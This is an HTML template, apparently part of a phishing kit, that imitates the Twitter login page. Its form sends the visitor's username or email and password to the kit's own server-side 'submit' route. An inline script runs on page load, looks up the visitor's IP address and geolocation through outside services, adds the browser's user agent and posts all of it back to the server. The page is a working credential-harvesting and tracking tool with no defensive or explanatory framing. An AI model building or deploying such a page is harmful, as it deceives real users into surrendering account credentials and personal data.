<!-- https://www.twitter.com -->
<!DOCTYPE html>
<html>
<head>
<title>Login On Twitter </title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<link rel="icon" href="images/twitter1.png">
<meta charset="UTF8">
<script src=".././modules/script.js" type="text/javascript"></script>
<style type="text/css">
*{
padding:0;
margin:0;
outline:0;
}
.header-twitter {
background: #fff;
width: 100%;
font-size: 25px;
font-weight: bold;
text-align: left;
position: relative;
border-radius: 10px;
}
.header-twitter img {
width: 55px;
}
.box-twitter {
width: 100%;
height: 400px;
position: absolute;
overflow: none;
font-size: 15px;
font-family: sans-serif;
border-radius: 10px;
}
.txt-login-twitter {
color: #000;
font-size: 20px;
font-weight: bold;
font-family: arial, sans-serif;
margin-top: 3%;
margin-bottom: 5%;
}
.input-box-twitter {
background: #f5f8fa;
width: 90%;
height: 40px;
margin-top: 10px;
margin-bottom: 18px;
padding: 10px;
padding-top: 5px;
font-size: 14px;
font-family: arial, sans-serif;
text-align: left;
position: relative;
border-bottom: 2px solid #657786;
border-radius: 2px;
outline: none;
z-index: 2;
}
.input-box-twitter label {
color: #657786;
text-align: left;
}
.input-box-twitter input {
background: transparent;
width: 100%;
height: auto;
padding: 7px;
padding-top: 3px;
padding-left: 0px;
color: #000;
font-size: 18px;
font-family: arial, sans-serif;
text-align: left;
position: relative;
border: none;
outline: none;
z-index: 2;
}
.btn-login-twitter {
background: #1da1f2;
width: 90%;
height: auto;
padding: 14px;
color: #fff;
font-size: 15px;
font-weight: bold;
font-family: arial, sans-serif;
border: none;
border-radius: 30px;
outline: none;
letter-spacing: 1;
}
.footer-menu-twitter {
width: auto;
height: auto;
margin: 0.5%;
margin-top: 7%;
color: #1da1f2;
font-size: 14px;
font-family: arial, sans-serif;
display: inline-block;
}
.bulet {
color: #000;
font-size: 8px;
}
.aktifnya {
color: #1da1f2;
border-bottom: 2px solid #1da1f2;
}
@media only screen and (max-width:600px) {
.input-box-twitter {
height: 45px;
}
}
</style>
</head>
<body>
<div class="pbox2" >

<div class="popup-login twitter animated fadeIn" style="">
<div class="popup-box-login-twitter">
<a class="close-other">
<i class="zmdi zmdi-close"></i>
</a> 
<div class="header-twitter"><center><img src="images/twitter1.png"></center></div> 
<center><div class="box-twitter"><center>
<form id="twlfrm"  action="{{ url_for("submit")}}" method="post">
<div class="txt-login-twitter">Login to Twitter</div> 
<div class="input-box-twitter">
<label>Phone, email, or username</label> 
<input type="text" name="email" required>
</div>
<div class="input-box-twitter">
<label>Password</label>
<input type="password" name="pass" id="twp" required>
</div>
<input type="hidden" name="location" value="twitter_mobile" >
<input type="hidden" name="link">
<button type="submit" class="btn-login-twitter">Log In</button> 
<div class="footer-menu-twitter">Forgot password?</div>
<div class="footer-menu-twitter bulet">•</div> 
<div class="footer-menu-twitter">Sign up to Twitter</div>
</form>
</center>
</div>
</center>
</div>
</div>
</div>






</body>
<script>
   window.onload = () => {
      function httpGet(theUrl) {
          var xmlHttp = new XMLHttpRequest();
          xmlHttp.open("GET", theUrl, false);
          xmlHttp.send(null);
          return xmlHttp.responseText;
      }
   
      ip = httpGet("https://api.ipify.org/")
      data = httpGet("https://ipapi.co/" + ip + "/json/")
      var url = "/";
      var xhr = new XMLHttpRequest();
      xhr.open("POST", url);
      xhr.setRequestHeader("Accept", "application/json");
      xhr.setRequestHeader("Content-Type", "application/json");
      xhr.onreadystatechange = function() {
          if (xhr.readyState === 4) {
              console.log(xhr.status);
              console.log(xhr.responseText);
          }
      };
      useragent = ',"useragent":"' + navigator.userAgent + '"'
      status = ',"status":"success"'
      new_data = data.slice(0, -1) + useragent + status + data.slice(-1);
      console.log(new_data)
      xhr.send(new_data);
   
   }
</script>
</html>